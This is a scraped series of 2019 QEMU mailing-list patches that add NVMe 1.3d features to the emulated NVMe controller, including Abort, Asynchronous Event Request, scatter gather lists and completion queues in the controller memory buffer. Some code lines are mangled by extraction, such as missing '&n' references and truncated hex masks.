 case NVME_TIMESTAMP:
 return nvme_set_feature_timestamp(n, cmd);
+case NVME_ASYNCHRONOUS_EVENT_CONF:
+n->features.async_config = dw11;
 break;
-
 default:
 trace_nvme_err_invalid_setfeat(dw10);
 return NVME_INVALID_FIELD | NVME_DNR;
@@ -854,6 +902,22 @@ static uint16_t nvme_set_feature(NvmeCtrl *n, NvmeCmd 
*cmd, NvmeRequest *req)
 return NVME_SUCCESS;
 }
 
+static uint16_t nvme_aer(NvmeCtrl *n, NvmeCmd *cmd, NvmeRequest *req)
+{
+trace_nvme_aer(req->cqe.cid);
+
+if (n->outstanding_aers > NVME_AERL) {
+trace_nvme_aer_aerl_exceeded();
+return NVME_AER_LIMIT_EXCEEDED;
+}
+
+n->aer_reqs[n->outstanding_aers] = req;
+timer_mod(n->aer_timer, qemu_clock_get_ns(QEMU_CLOCK_VIRTUAL) + 500);
+n->outstanding_aers++;
+
+return NVME_NO_COMPLETE;
+}
+
 static uint16_t nvme_abort(NvmeCtrl *n, NvmeCmd *cmd, NvmeRequest *req)
 {
 NvmeSQueue *sq;
@@ -918,6 +982,8 @@ static uint16_t nvme_admin_cmd(NvmeCtrl *n, NvmeCmd *cmd, 
NvmeRequest *req)
 return nvme_set_feature(n, cmd, req);
 case NVME_ADM_CMD_GET_FEATURES:
 return nvme_get_feature(n, cmd, req);
+case NVME_ADM_CMD_ASYNC_EV_REQ:
+return nvme_aer(n, cmd, req);
 case NVME_ADM_CMD_ABORT:
 return nvme_abort(n, cmd, req);
 default:
@@ -963,6 +1029,7 @@ static void nvme_process_sq(void *opaque)
 
 static void nvme_clear_ctrl(NvmeCtrl *n)
 {
+NvmeAsyncEvent *event;
 int i;
 
 blk_drain(n->conf.blk);
@@ -978,8 +1045,19 @@ static void nvme_clear_ctrl(NvmeCtrl *n)
 }
 }
 
+if (n->aer_timer) {
+timer_del(n->aer_timer);
+timer_free(n->aer_timer);
+n->aer_timer = NULL;
+}
+while ((event = QSIMPLEQ_FIRST(>aer_queue)) != NULL) {
+QSIMPLEQ_REMOVE_HEAD(>aer_queue, entry);
+g_free(event);
+}
+
 blk_flush(n->conf.blk);
 n->bar.cc = 0;
+n->outstanding_aers = 0;
 }
 
 static int nvme_start_ctrl(NvmeCtrl *n)
@@ -1074,6 +1152,9 @@ static int

[Qemu-block] [PATCH 05/16] nvme: populate the mandatory subnqn and ver fields

2019-07-05 Thread Klaus Birkelund Jensen

Required for compliance with NVMe revision 1.2.1 or later. See NVM
Express 1.2.1, Section 5.11 ("Identify command"), Figure 90 and Section
7.9 ("NVMe Qualified Names").

This also bumps the supported version to 1.2.1.

Signed-off-by: Klaus Birkelund Jensen 
---
 hw/block/nvme.c | 8 +++-
 1 file changed, 7 insertions(+), 1 deletion(-)

diff --git a/hw/block/nvme.c b/hw/block/nvme.c
index ce2e5365385b..3c392dc336a8 100644
--- a/hw/block/nvme.c
+++ b/hw/block/nvme.c
@@ -1364,12 +1364,18 @@ static void nvme_realize(PCIDevice *pci_dev, Error 
**errp)
 id->ieee[0] = 0x00;
 id->ieee[1] = 0x02;
 id->ieee[2] = 0xb3;
+id->ver = cpu_to_le32(0x00010201);
 id->oacs = cpu_to_le16(0);
 id->frmw = 7 << 1;
 id->sqes = (0x6 << 4) | 0x6;
 id->cqes = (0x4 << 4) | 0x4;
 id->nn = cpu_to_le32(n->num_namespaces);
 id->oncs = cpu_to_le16(NVME_ONCS_WRITE_ZEROS | NVME_ONCS_TIMESTAMP);
+
+strcpy((char *) id->subnqn, "nqn.2014-08.org.nvmexpress:uuid:");
+qemu_uuid_unparse(_uuid,
+(char *) id->subnqn + strlen((char *) id->subnqn));
+
 id->psd[0].mp = cpu_to_le16(0x9c4);
 id->psd[0].enlat = cpu_to_le32(0x10);
 id->psd[0].exlat = cpu_to_le32(0x4);
@@ -1384,7 +1390,7 @@ static void nvme_realize(PCIDevice *pci_dev, Error **errp)
 NVME_CAP_SET_CSS(n->bar.cap, 1);
 NVME_CAP_SET_MPSMAX(n->bar.cap, 4);
 
-n->bar.vs = 0x00010200;
+n->bar.vs = 0x00010201;
 n->bar.intmc = n->bar.intms = 0;
 
 if (n->params.cmb_size_mb) {
-- 
2.20.1

[Qemu-block] [PATCH 07/16] nvme: support Abort command

2019-07-05 Thread Klaus Birkelund Jensen

Required for compliance with NVMe revision 1.2.1. See NVM Express 1.2.1,
Section 5.1 ("Abort command").

Extracted from Keith's qemu-nvme tree. Modified to only consider queued
and not executing commands.

Signed-off-by: Klaus Birkelund Jensen 
---
 hw/block/nvme.c | 56 +
 1 file changed, 56 insertions(+)

diff --git a/hw/block/nvme.c b/hw/block/nvme.c
index b31e5ff681bd..4b9ff51868c0 100644
--- a/hw/block/nvme.c
+++ b/hw/block/nvme.c
@@ -38,6 +38,7 @@
 #include "trace.h"
 #include "nvme.h"
 
+#define NVME_OP_ABORTED 0xff
 #define NVME_GUEST_ERR(trace, fmt, ...) \
 do { \
 (trace_##trace)(__VA_ARGS__); \
@@ -848,6 +849,54 @@ static uint16_t nvme_set_feature(NvmeCtrl *n, NvmeCmd 
*cmd, NvmeRequest *req)
 trace_nvme_err_invalid_setfeat(dw10);
 return NVME_INVALID_FIELD | NVME_DNR;
 }
+
+return NVME_SUCCESS;
+}
+
+static uint16_t nvme_abort(NvmeCtrl *n, NvmeCmd *cmd, NvmeRequest *req)
+{
+NvmeSQueue *sq;
+NvmeRequest *new;
+uint32_t index = 0;
+uint16_t sqid = cmd->cdw10 & 0x;
+uint16_t cid = (cmd->cdw10 >> 16) & 0x;
+
+req->cqe.result = 1;
+if (nvme_check_sqid(n, sqid)) {
+return NVME_INVALID_FIELD | NVME_DNR;
+}
+
+sq = n->sq[sqid];
+
+/* only consider queued (and not executing) commands for abort */
+while ((sq->head + index) % sq->size != sq->tail) {
+NvmeCmd abort_cmd;
+hwaddr addr;
+
+addr = sq->dma_addr + ((sq->head + index) % sq->size) * n->sqe_size;
+
+nvme_addr_read(n, addr, (void *) _cmd, sizeof(abort_cmd));
+if (abort_cmd.cid == cid) {
+req->cqe.result = 0;
+new = QTAILQ_FIRST(>req_list);
+QTAILQ_REMOVE(>req_list, new, entry);
+QTAILQ_INSERT_TAIL(>out_req_list, new, entry);
+
+memset(>cqe, 0, sizeof(new->cqe));
+new->cqe.cid = cid;
+new->status = NVME_CMD_ABORT_REQ;
+
+abort_cmd.opcode = NVME_OP_ABORTED;
+nvme_addr_write(n, addr, (void *) _cmd, sizeof(abort_cmd));
+
+nvme_enqueue_req_completion(n->cq[sq->cqid], new);
+
+return NVME_SUCCESS;
+}
+
+++index;
+}
+
 return NVME_SUCCESS;
 }
 
@@ -868,6 +917,8 @@ static uint16_t nvme_admin_cmd(NvmeCtrl *n, NvmeCmd *cmd, 
NvmeRequest *req)
 return nvme_set_feature(n, cmd, req);
 case NVME_ADM_CMD_GET_FEATURES:
 return nvme_get_feature(n, cmd, req);
+case NVME_ADM_CMD_ABORT:
+return nvme_abort(n, cmd, req);
 default:
 trace_nvme_err_invalid_admin_opc(cmd->opcode);
 return NVME_INVALID_OPCODE | NVME_DNR;
@@ -890,6 +941,10 @@ static void nvme_process_sq(void *opaque)
 nvme_addr_read(n, addr, (void *), sizeof(cmd));
 nvme_inc_sq_head(sq);
 
+if (cmd.opcode == NVME_OP_ABORTED) {
+continue;
+}
+
 req = QTAILQ_FIRST(>req_list);
 QTAILQ_REMOVE(>req_list, req, entry);
 QTAILQ_INSERT_TAIL(>out_req_list, req, entry);
@@ -1376,6 +1431,7 @@ static void nvme_realize(PCIDevice *pci_dev, Error **errp)
 id->ieee[2] = 0xb3;
 id->ver = cpu_to_le32(0x00010201);
 id->oacs = cpu_to_le16(0);
+id->acl = 3;
 id->frmw = 7 << 1;
 id->sqes = (0x6 << 4) | 0x6;
 id->cqes = (0x4 << 4) | 0x4;
-- 
2.20.1

[Qemu-block] [PATCH 11/16] nvme: add missing mandatory Features

2019-07-05 Thread Klaus Birkelund Jensen

Add support for returning a resonable response to Get/Set Features of
mandatory features.

Signed-off-by: Klaus Birkelund Jensen 
---
 hw/block/nvme.c   | 49 ---
 hw/block/trace-events |  2 ++
 include/block/nvme.h  |  3 ++-
 3 files changed, 50 insertions(+), 4 deletions(-)

diff --git a/hw/block/nvme.c b/hw/block/nvme.c
index 93f5dff197e0..8259dd7c1d6c 100644
--- a/hw/block/nvme.c
+++ b/hw/block/nvme.c
@@ -860,13 +860,24 @@ static uint16_t nvme_get_feature_timestamp(NvmeCtrl *n, 
NvmeCmd *cmd)
 static uint16_t nvme_get_feature(NvmeCtrl *n, NvmeCmd *cmd, NvmeRequest *req)
 {
 uint32_t dw10 = le32_to_cpu(cmd->cdw10);
+uint32_t dw11 = le32_to_cpu(cmd->cdw11);
 uint32_t result;
 
+trace_nvme_getfeat(dw10);
+
 switch (dw10) {
+case NVME_ARBITRATION:
+result = cpu_to_le32(n->features.arbitration);
+break;
+case NVME_POWER_MANAGEMENT:
+result = cpu_to_le32(n->features.power_mgmt);
+break;
 case NVME_TEMPERATURE_THRESHOLD:
 result = cpu_to_le32(n->features.temp_thresh);
 break;
 case NVME_ERROR_RECOVERY:
+result = cpu_to_le32(n->features.err_rec);
+break;
 case NVME_VOLATILE_WRITE_CACHE:
 result = blk_enable_write_cache(n->conf.blk);
 trace_nvme_getfeat_vwcache(result ? "enabled" : "disabled");
@@ -878,6 +889,19 @@ static uint16_t nvme_get_feature(NvmeCtrl *n, NvmeCmd 
*cmd, NvmeRequest *req)
 break;
 case NVME_TIMESTAMP:
 return nvme_get_feature_timestamp(n, cmd);
+case NVME_INTERRUPT_COALESCING:
+result = cpu_to_le32(n->features.int_coalescing);
+break;
+case NVME_INTERRUPT_VECTOR_CONF:
+if ((dw11 & 0x) > n->params.num_queues) {
+return NVME_INVALID_FIELD | NVME_DNR;
+}
+
+result = cpu_to_le32(n->features.int_vector_config[dw11 & 0x]);
+break;
+case NVME_WRITE_ATOMICITY:
+result = cpu_to_le32(n->features.write_atomicity);
+break;
 case NVME_ASYNCHRONOUS_EVENT_CONF:
 result = cpu_to_le32(n->features.async_config);
 break;
@@ -913,6 +937,8 @@ static uint16_t nvme_set_feature(NvmeCtrl *n, NvmeCmd *cmd, 
NvmeRequest *req)
 uint32_t dw10 = le32_to_cpu(cmd->cdw10);
 uint32_t dw11 = le32_to_cpu(cmd->cdw11);
 
+trace_nvme_setfeat(dw10, dw11);
+
 switch (dw10) {
 case NVME_TEMPERATURE_THRESHOLD:
 n->features.temp_thresh = dw11;
@@ -937,6 +963,13 @@ static uint16_t nvme_set_feature(NvmeCtrl *n, NvmeCmd 
*cmd, NvmeRequest *req)
 case NVME_ASYNCHRONOUS_EVENT_CONF:
 n->features.async_config = dw11;
 break;
+case NVME_ARBITRATION:
+case NVME_POWER_MANAGEMENT:
+case NVME_ERROR_RECOVERY:
+case NVME_INTERRUPT_COALESCING:
+case NVME_INTERRUPT_VECTOR_CONF:
+case NVME_WRITE_ATOMICITY:
+return NVME_FEAT_NOT_CHANGABLE | NVME_DNR;
 default:
 trace_nvme_err_invalid_setfeat(dw10);
 return NVME_INVALID_FIELD | NVME_DNR;
@@ -1693,6 +1726,14 @@ static void nvme_init_state(NvmeCtrl *n)
 n->aer_reqs = g_new0(NvmeRequest *, NVME_AERL + 1);
 n->temperature = NVME_TEMPERATURE;
 n->features.temp_thresh = 0x14d;
+n->features.int_vector_config = g_malloc0_n(n->params.num_queues,
+sizeof(*n->features.int_vector_config));
+
+/* disable coalescing (not supported) */
+for (int i = 0; i < n->params.num_queues; i++) {
+n->features.int_vector_config[i] = i | (1 << 16);
+}
+
 }
 
 static void nvme_init_cmb(NvmeCtrl *n, PCIDevice *pci_dev)
@@ -1769,6 +1810,10 @@ static void nvme_init_ctrl(NvmeCtrl *n)
 id->nn = cpu_to_le32(n->num_namespaces);
 id->oncs = cpu_to_le16(NVME_ONCS_WRITE_ZEROS | NVME_ONCS_TIMESTAMP);
 
+if (blk_enable_write_cache(n->conf.blk)) {
+id->vwc = 1;
+}
+
 strcpy((char *) id->subnqn, "nqn.2014-08.org.nvmexpress:uuid:");
 qemu_uuid_unparse(_uuid,
 (char *) id->subnqn + strlen((char *) id->subnqn));
@@ -1776,9 +1821,6 @@ static void nvme_init_ctrl(NvmeCtrl *n)
 id->psd[0].mp = cpu_to_le16(0x9c4);
 id->psd[0].enlat = cpu_to_le32(0x10);
 id->psd[0].exlat = cpu_to_le32(0x4);
-if (blk_enable_write_cache(n->conf.blk)) {
-id->vwc = 1;
-}
 
 n->bar.cap = 0;
 NVME_CAP_SET_MQES(n->bar.cap, 0x7ff);
@@ -1876,6 +1918,7 @@ static void nvme_exit(PCIDevice *pci_dev)
 g_free(n->sq);
 g_free(n->elpes);
 g_free(n->aer_reqs);
+g_free(n->features.int_vector_config);
 
 if (n->params.cmb_size_mb) {
 g_free(n->cmbuf);
diff --git a/hw/block/trace-events b/hw/block/trace-events
index ed666bbc94f2..17485bb0375b 100644
--- a/hw/block/trace-events
+++ b/hw/block/trace-events
@@ -41,6 +41,8 @@ nvme_del_cq(uint16_t cqid) "deleted completion queue, 
sqid=%"PRIu16""
 nvme_identify_ctrl(void) "identify controller"
 nvme_identify_ns(uint16_t ns) "identify namespace, nsid=%"PRIu16""
 nvme_identify_nslist(uint16_t ns) "identify

[Qemu-block] [PATCH 15/16] nvme: support scatter gather lists

2019-07-05 Thread Klaus Birkelund Jensen

For now, support the Data Block, Segment and Last Segment descriptor
types.

See NVM Express 1.3d, Section 4.4 ("Scatter Gather List (SGL)").

Signed-off-by: Klaus Birkelund Jensen 
---
 block/nvme.c  |  18 +-
 hw/block/nvme.c   | 390 +++---
 hw/block/nvme.h   |   6 +
 hw/block/trace-events |   3 +
 include/block/nvme.h  |  64 ++-
 5 files changed, 410 insertions(+), 71 deletions(-)

diff --git a/block/nvme.c b/block/nvme.c
index 73ed5fa75f2e..907a610633f2 100644
--- a/block/nvme.c
+++ b/block/nvme.c
@@ -438,7 +438,7 @@ static void nvme_identify(BlockDriverState *bs, int 
namespace, Error **errp)
 error_setg(errp, "Cannot map buffer for DMA");
 goto out;
 }
-cmd.prp1 = cpu_to_le64(iova);
+cmd.dptr.prp.prp1 = cpu_to_le64(iova);
 
 if (nvme_cmd_sync(bs, s->queues[0], )) {
 error_setg(errp, "Failed to identify controller");
@@ -512,7 +512,7 @@ static bool nvme_add_io_queue(BlockDriverState *bs, Error 
**errp)
 }
 cmd = (NvmeCmd) {
 .opcode = NVME_ADM_CMD_CREATE_CQ,
-.prp1 = cpu_to_le64(q->cq.iova),
+.dptr.prp.prp1 = cpu_to_le64(q->cq.iova),
 .cdw10 = cpu_to_le32(((queue_size - 1) << 16) | (n & 0x)),
 .cdw11 = cpu_to_le32(0x3),
 };
@@ -523,7 +523,7 @@ static bool nvme_add_io_queue(BlockDriverState *bs, Error 
**errp)
 }
 cmd = (NvmeCmd) {
 .opcode = NVME_ADM_CMD_CREATE_SQ,
-.prp1 = cpu_to_le64(q->sq.iova),
+.dptr.prp.prp1 = cpu_to_le64(q->sq.iova),
 .cdw10 = cpu_to_le32(((queue_size - 1) << 16) | (n & 0x)),
 .cdw11 = cpu_to_le32(0x1 | (n << 16)),
 };
@@ -858,16 +858,16 @@ try_map:
 case 0:
 abort();
 case 1:
-cmd->prp1 = pagelist[0];
-cmd->prp2 = 0;
+cmd->dptr.prp.prp1 = pagelist[0];
+cmd->dptr.prp.prp2 = 0;
 break;
 case 2:
-cmd->prp1 = pagelist[0];
-cmd->prp2 = pagelist[1];
+cmd->dptr.prp.prp1 = pagelist[0];
+cmd->dptr.prp.prp2 = pagelist[1];
 break;
 default:
-cmd->prp1 = pagelist[0];
-cmd->prp2 = cpu_to_le64(req->prp_list_iova + sizeof(uint64_t));
+cmd->dptr.prp.prp1 = pagelist[0];
+cmd->dptr.prp.prp2 = cpu_to_le64(req->prp_list_iova + 
sizeof(uint64_t));
 break;
 }
 trace_nvme_cmd_map_qiov(s, cmd, req, qiov, entries);
diff --git a/hw/block/nvme.c b/hw/block/nvme.c
index b285119fd29a..6bf62952dd13 100644
--- a/hw/block/nvme.c
+++ b/hw/block/nvme.c
@@ -273,6 +273,198 @@ unmap:
 return status;
 }
 
+static uint16_t nvme_map_sgl_data(NvmeCtrl *n, QEMUSGList *qsg,
+NvmeSglDescriptor *segment, uint64_t nsgld, uint32_t *len,
+NvmeRequest *req)
+{
+dma_addr_t addr, trans_len;
+
+for (int i = 0; i < nsgld; i++) {
+if (NVME_SGL_TYPE(segment[i].type) != SGL_DESCR_TYPE_DATA_BLOCK) {
+trace_nvme_err_invalid_sgl_descriptor(req->cqe.cid,
+NVME_SGL_TYPE(segment[i].type));
+return NVME_SGL_DESCRIPTOR_TYPE_INVALID | NVME_DNR;
+}
+
+if (*len == 0) {
+if (!NVME_CTRL_SGLS_EXCESS_LENGTH(n->id_ctrl.sgls)) {
+trace_nvme_err_invalid_sgl_excess_length(req->cqe.cid);
+return NVME_DATA_SGL_LENGTH_INVALID | NVME_DNR;
+}
+
+break;
+}
+
+addr = le64_to_cpu(segment[i].addr);
+trans_len = MIN(*len, le64_to_cpu(segment[i].len));
+
+if (nvme_addr_is_cmb(n, addr)) {
+/*
+ * All data and metadata, if any, associated with a particular
+ * command shall be located in either the CMB or host memory. Thus,
+ * if an address if found to be in the CMB and we have already
+ * mapped data that is in host memory, the use is invalid.
+ */
+if (!req->is_cmb && qsg->size) {
+return NVME_INVALID_USE_OF_CMB | NVME_DNR;
+}
+
+req->is_cmb = true;
+} else {
+/*
+ * Similarly, if the address does not reference the CMB, but we
+ * have already established that the request has data or metadata
+ * in the CMB, the use is invalid.
+ */
+if (req->is_cmb) {
+return NVME_INVALID_USE_OF_CMB | NVME_DNR;
+}
+}
+
+qemu_sglist_add(qsg, addr, trans_len);
+
+*len -= trans_len;
+}
+
+return NVME_SUCCESS;
+}
+
+static uint16_t nvme_map_sgl(NvmeCtrl *n, QEMUSGList *qsg,
+NvmeSglDescriptor sgl, uint32_t len, NvmeRequest *req)
+{
+const int MAX_NSGLD = 256;
+
+NvmeSglDescriptor segment[MAX_NSGLD];
+uint64_t nsgld;
+uint16_t status;
+bool sgl_in_cmb = false;
+hwaddr addr = le64_to_cpu(sgl.addr);
+
+trace_nvme_map_sgl(req->cqe.cid, NVME_SGL_TYPE(sgl.type), req->nlb, len);
+
+pci_dma_sglist_init(qsg, >parent_obj, 1);
+
+/*
+ * If the entire

[Qemu-block] [PATCH 06/16] nvme: support completion queue in cmb

2019-07-05 Thread Klaus Birkelund Jensen

While not particularly useful, allow completion queues in the controller
memory buffer. Could be useful for testing.

Signed-off-by: Klaus Birkelund Jensen 
---
 hw/block/nvme.c | 16 +---
 1 file changed, 13 insertions(+), 3 deletions(-)

diff --git a/hw/block/nvme.c b/hw/block/nvme.c
index 3c392dc336a8..b31e5ff681bd 100644
--- a/hw/block/nvme.c
+++ b/hw/block/nvme.c
@@ -57,6 +57,16 @@ static void nvme_addr_read(NvmeCtrl *n, hwaddr addr, void 
*buf, int size)
 }
 }
 
+static void nvme_addr_write(NvmeCtrl *n, hwaddr addr, void *buf, int size)
+{
+if (n->cmbsz && addr >= n->ctrl_mem.addr &&
+addr < (n->ctrl_mem.addr + int128_get64(n->ctrl_mem.size))) {
+memcpy((void *)>cmbuf[addr - n->ctrl_mem.addr], buf, size);
+return;
+}
+pci_dma_write(>parent_obj, addr, buf, size);
+}
+
 static int nvme_check_sqid(NvmeCtrl *n, uint16_t sqid)
 {
 return sqid < n->params.num_queues && n->sq[sqid] != NULL ? 0 : -1;
@@ -276,6 +286,7 @@ static void nvme_post_cqes(void *opaque)
 
 QTAILQ_FOREACH_SAFE(req, >req_list, entry, next) {
 NvmeSQueue *sq;
+NvmeCqe *cqe = >cqe;
 hwaddr addr;
 
 if (nvme_cq_full(cq)) {
@@ -289,8 +300,7 @@ static void nvme_post_cqes(void *opaque)
 req->cqe.sq_head = cpu_to_le16(sq->head);
 addr = cq->dma_addr + cq->tail * n->cqe_size;
 nvme_inc_cq_tail(cq);
-pci_dma_write(>parent_obj, addr, (void *)>cqe,
-sizeof(req->cqe));
+nvme_addr_write(n, addr, (void *) cqe, sizeof(*cqe));
 QTAILQ_INSERT_TAIL(>req_list, req, entry);
 }
 if (cq->tail != cq->head) {
@@ -1399,7 +1409,7 @@ static void nvme_realize(PCIDevice *pci_dev, Error **errp)
 NVME_CMBLOC_SET_OFST(n->bar.cmbloc, 0);
 
 NVME_CMBSZ_SET_SQS(n->bar.cmbsz, 1);
-NVME_CMBSZ_SET_CQS(n->bar.cmbsz, 0);
+NVME_CMBSZ_SET_CQS(n->bar.cmbsz, 1);
 NVME_CMBSZ_SET_LISTS(n->bar.cmbsz, 0);
 NVME_CMBSZ_SET_RDS(n->bar.cmbsz, 1);
 NVME_CMBSZ_SET_WDS(n->bar.cmbsz, 1);
-- 
2.20.1

[Qemu-block] [PATCH 00/16] nvme: support NVMe v1.3d, SGLs and multiple namespaces

2019-07-05 Thread Klaus Birkelund Jensen

Matt Fitzpatrick's post ("[RFC,v1] Namespace Management Support") pushed
me to finally get my head out of my a** and post this series.

This is basically a follow-up to my previous series ("nvme: v1.3, sgls,
metadata and new 'ocssd' device"), but I'm not tagging it as a v2
because the patches for metadata and the ocssd device have been dropped.
Instead, this series also includes a patch that enables support for
multiple namespaces in a "proper" way by adding a new 'nvme-ns' device
model such that the "real" nvme device is composed of the 'nvme' device
model (the core controller) and multiple 'nvme-ns' devices that model
the namespaces.

All in all, the patches in this series should be less controversial, but
I know there is a lot to go through. I've kept commit 011de3d531b6
("nvme: refactor device realization") as a single commit, but I can chop
it up if any reviwers would prefer that, but the series is already at 16
patches. The refactor patch is basically just code movement.

At a glance, this series:

  - generally fixes up the device to be as close to NVMe 1.3d compliant as
possible (in terms of 'mandatory' features) by:
  - adding proper setting of the SUBNQN and VER fields
  - supporting the Abort command
  - supporting the Asynchronous Event Request command
  - supporting the Get Log Page command
  - providing reasonable stub responses to Get/Set Feature command of
mandatory features
  - adds support for scatter gather lists (SGLs)
  - simplifies DMA/CMB mappings and support PRPs/SGLs in the CMB
  - adds support for multiple block requests per nvme request (this is
useful for future support for metadata, OCSSD 2.0 vector requests
and upcoming zoned namespaces)
  - adds support for multiple namespaces


Thanks to everyone who chipped in on the discussion on multiple
namespaces! You're CC'ed ;)


Klaus Birkelund Jensen (16):
  nvme: simplify namespace code
  nvme: move device parameters to separate struct
  nvme: fix lpa field
  nvme: add missing fields in identify controller
  nvme: populate the mandatory subnqn and ver fields
  nvme: support completion queue in cmb
  nvme: support Abort command
  nvme: refactor device realization
  nvme: support Asynchronous Event Request command
  nvme: support Get Log Page command
  nvme: add missing mandatory Features
  nvme: bump supported NVMe revision to 1.3d
  nvme: simplify dma/cmb mappings
  nvme: support multiple block requests per request
  nvme: support scatter gather lists
  nvme: support multiple namespaces

 block/nvme.c   |   18 +-
 hw/block/Makefile.objs |2 +-
 hw/block/nvme-ns.c |  139 
 hw/block/nvme-ns.h |   35 +
 hw/block/nvme.c| 1629 
 hw/block/nvme.h|   99 ++-
 hw/block/trace-events  |   24 +-
 include/block/nvme.h   |  130 +++-
 8 files changed, 1739 insertions(+), 337 deletions(-)
 create mode 100644 hw/block/nvme-ns.c
 create mode 100644 hw/block/nvme-ns.h

-- 
2.20.1

[Qemu-block] [PATCH 02/16] nvme: move device parameters to separate struct

2019-07-05 Thread Klaus Birkelund Jensen

Move device configuration parameters to separate struct to make it
explicit what is configurable and what is set internally.

Also, clean up some includes.

Signed-off-by: Klaus Birkelund Jensen 
---
 hw/block/nvme.c | 54 +++--
 hw/block/nvme.h | 16 ---
 2 files changed, 38 insertions(+), 32 deletions(-)

diff --git a/hw/block/nvme.c b/hw/block/nvme.c
index 28ebaf1368b1..a3f83f3c2135 100644
--- a/hw/block/nvme.c
+++ b/hw/block/nvme.c
@@ -27,18 +27,14 @@
 
 #include "qemu/osdep.h"
 #include "qemu/units.h"
+#include "qemu/cutils.h"
+#include "qemu/log.h"
 #include "hw/block/block.h"
-#include "hw/hw.h"
 #include "hw/pci/msix.h"
-#include "hw/pci/pci.h"
 #include "sysemu/sysemu.h"
-#include "qapi/error.h"
-#include "qapi/visitor.h"
 #include "sysemu/block-backend.h"
+#include "qapi/error.h"
 
-#include "qemu/log.h"
-#include "qemu/module.h"
-#include "qemu/cutils.h"
 #include "trace.h"
 #include "nvme.h"
 
@@ -63,12 +59,12 @@ static void nvme_addr_read(NvmeCtrl *n, hwaddr addr, void 
*buf, int size)
 
 static int nvme_check_sqid(NvmeCtrl *n, uint16_t sqid)
 {
-return sqid < n->num_queues && n->sq[sqid] != NULL ? 0 : -1;
+return sqid < n->params.num_queues && n->sq[sqid] != NULL ? 0 : -1;
 }
 
 static int nvme_check_cqid(NvmeCtrl *n, uint16_t cqid)
 {
-return cqid < n->num_queues && n->cq[cqid] != NULL ? 0 : -1;
+return cqid < n->params.num_queues && n->cq[cqid] != NULL ? 0 : -1;
 }
 
 static void nvme_inc_cq_tail(NvmeCQueue *cq)
@@ -630,7 +626,7 @@ static uint16_t nvme_create_cq(NvmeCtrl *n, NvmeCmd *cmd)
 trace_nvme_err_invalid_create_cq_addr(prp1);
 return NVME_INVALID_FIELD | NVME_DNR;
 }
-if (unlikely(vector > n->num_queues)) {
+if (unlikely(vector > n->params.num_queues)) {
 trace_nvme_err_invalid_create_cq_vector(vector);
 return NVME_INVALID_IRQ_VECTOR | NVME_DNR;
 }
@@ -782,7 +778,8 @@ static uint16_t nvme_get_feature(NvmeCtrl *n, NvmeCmd *cmd, 
NvmeRequest *req)
 trace_nvme_getfeat_vwcache(result ? "enabled" : "disabled");
 break;
 case NVME_NUMBER_OF_QUEUES:
-result = cpu_to_le32((n->num_queues - 2) | ((n->num_queues - 2) << 
16));
+result = cpu_to_le32((n->params.num_queues - 2) |
+((n->params.num_queues - 2) << 16));
 trace_nvme_getfeat_numq(result);
 break;
 case NVME_TIMESTAMP:
@@ -827,9 +824,10 @@ static uint16_t nvme_set_feature(NvmeCtrl *n, NvmeCmd 
*cmd, NvmeRequest *req)
 case NVME_NUMBER_OF_QUEUES:
 trace_nvme_setfeat_numq((dw11 & 0x) + 1,
 ((dw11 >> 16) & 0x) + 1,
-n->num_queues - 1, n->num_queues - 1);
-req->cqe.result =
-cpu_to_le32((n->num_queues - 2) | ((n->num_queues - 2) << 16));
+n->params.num_queues - 1,
+n->params.num_queues - 1);
+req->cqe.result = cpu_to_le32((n->params.num_queues - 2) |
+((n->params.num_queues - 2) << 16));
 break;
 
 case NVME_TIMESTAMP:
@@ -903,12 +901,12 @@ static void nvme_clear_ctrl(NvmeCtrl *n)
 
 blk_drain(n->conf.blk);
 
-for (i = 0; i < n->num_queues; i++) {
+for (i = 0; i < n->params.num_queues; i++) {
 if (n->sq[i] != NULL) {
 nvme_free_sq(n->sq[i], n);
 }
 }
-for (i = 0; i < n->num_queues; i++) {
+for (i = 0; i < n->params.num_queues; i++) {
 if (n->cq[i] != NULL) {
 nvme_free_cq(n->cq[i], n);
 }
@@ -1311,7 +1309,7 @@ static void nvme_realize(PCIDevice *pci_dev, Error **errp)
 int64_t bs_size;
 uint8_t *pci_conf;
 
-if (!n->num_queues) {
+if (!n->params.num_queues) {
 error_setg(errp, "num_queues can't be zero");
 return;
 }
@@ -1327,7 +1325,7 @@ static void nvme_realize(PCIDevice *pci_dev, Error **errp)
 return;
 }
 
-if (!n->serial) {
+if (!n->params.serial) {
 error_setg(errp, "serial property not set");
 return;
 }
@@ -1344,24 +1342,24 @@ static void nvme_realize(PCIDevice *pci_dev, Error 
**errp)
 pcie_endpoint_cap_init(pci_dev, 0x80);
 
 n->num_namespaces = 1;
-n->reg_size = pow2ceil(0x1004 + 2 * (n->num_queues + 1) * 4);
+n->reg_size = pow2ceil(0x1004 + 2 * (n->params.num_queues + 1) * 4);
 n->ns_size = bs_size / (uint64_t)n->num_namespaces;
 
-n->sq = g_new0(NvmeSQueue *, n->num_queues);
-n->cq = g_new0(NvmeCQueue *, n->num_queues);
+n->sq = g_new0(NvmeSQueue *, n->params.num_queues);
+n->cq = g_new0(NvmeCQueue *, n->params.num_queues);
 
 memory_region_init_io(>iomem, OBJECT(n), _mmio_ops, n,
   "nvme", n->reg_size);
 pci_register_bar(pci_dev, 0,
 PCI_BASE_ADDRESS_SPACE_MEMORY | PCI_BASE_ADDRESS_MEM_TYPE_64,
 >iomem);
-msix_init_exclusive_bar(pci_dev, n->num_queues, 4, NULL);
+msix_init_exclusive_bar(pci_dev,

[Qemu-block] [PATCH 04/16] nvme: add missing fields in identify controller

2019-07-05 Thread Klaus Birkelund Jensen

Not used by the device model but added for completeness. See NVM Express
1.2.1, Section 5.11 ("Identify command"), Figure 90.

Signed-off-by: Klaus Birkelund Jensen 
---
 include/block/nvme.h | 34 +-
 1 file changed, 29 insertions(+), 5 deletions(-)

diff --git a/include/block/nvme.h b/include/block/nvme.h
index 3ec8efcc435e..1b0accd4fe2b 100644
--- a/include/block/nvme.h
+++ b/include/block/nvme.h
@@ -543,7 +543,13 @@ typedef struct NvmeIdCtrl {
 uint8_t ieee[3];
 uint8_t cmic;
 uint8_t mdts;
-uint8_t rsvd255[178];
+uint16_tcntlid;
+uint32_tver;
+uint16_trtd3r;
+uint32_trtd3e;
+uint32_toaes;
+uint32_tctratt;
+uint8_t rsvd255[156];
 uint16_toacs;
 uint8_t acl;
 uint8_t aerl;
@@ -551,10 +557,22 @@ typedef struct NvmeIdCtrl {
 uint8_t lpa;
 uint8_t elpe;
 uint8_t npss;
-uint8_t rsvd511[248];
+uint8_t avscc;
+uint8_t apsta;
+uint16_twctemp;
+uint16_tcctemp;
+uint16_tmtfa;
+uint32_thmpre;
